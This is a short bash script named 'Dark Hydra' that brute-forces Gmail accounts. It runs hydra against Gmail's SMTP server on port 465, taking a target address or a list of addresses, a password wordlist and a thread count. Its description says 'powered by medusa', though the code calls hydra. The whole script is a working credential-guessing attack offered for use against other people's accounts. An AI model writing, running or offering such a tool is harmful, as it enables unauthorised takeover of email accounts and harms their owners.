#!/bin/bash

#=========================#
#     Colors module       #
#=========================#

def="\e[1;"
white="${def}97m"
red="${def}91m"
cyan="${def}96m"
magenta="${def}95m"
green="${def}92m"
yellow="${def}93m"
reset="${def}39m"
blink="${def}5m"
Hidden="${def}8m"
under="${def}4m"
blinkre="${def}25m"
rehide="${def}28m"

#===================#
#  ROOT PRIVILEGIES #
#===================#

if [[ $EUID -ne 0 ]]; then
        echo -e "$red You don't have Root privilegies, execute the script as root.$nc"
        exit 1
fi

#=========== END MODULES ============#

server="smtp.gmail.com smtp"

clear

figlet Dark Hydra | lolcat

echo -e $cyan":: ${red}Description ${cyan}::\n"

echo -e "This tool powered by medusa to brute force gmail account.\n$reset"

echo -e "Your target need to open less secure apps : ${red}Open\n$reset"

	echo -e "Usage: --help		       Open menu"
	echo -e "       -u <target's gmail>    Add target's gmail"
	echo -e "       -U <gmaillist file>    Add gmail list file"
	echo -e "       -P <wordlist file>     Add wordlist file"
	echo -e "       -t <task number>       Add Threads\n"
	
echo -e $white"Example: ./gbrute -u <target's gmail> -P <wordlist file> -t 64\n"

while getopts u:U:P:s:t:c options; do
	case $options in
		u) gmail=$OPTARG;;
		U) GMAIL=$OPTARG ;;
		P) PWD=$OPTARG;;
		t) Threads=$OPTARG;;
		c) clear ;;
	esac
done

if [ -z "$gmail" ]; then

sleep 0.1

else

echo -e $cyan && hydra -S -l $gmail -P $PWD -t $Threads -V -e ns -s 465 $server -f -q

fi

if [ -z "$GMAIL" ]; then

sleep 0.1

else

echo -e $cyan && hydra -S -L $GMAIL -P $PWD -t $Threads -V -e ns -s 465 $server -f -q

fi
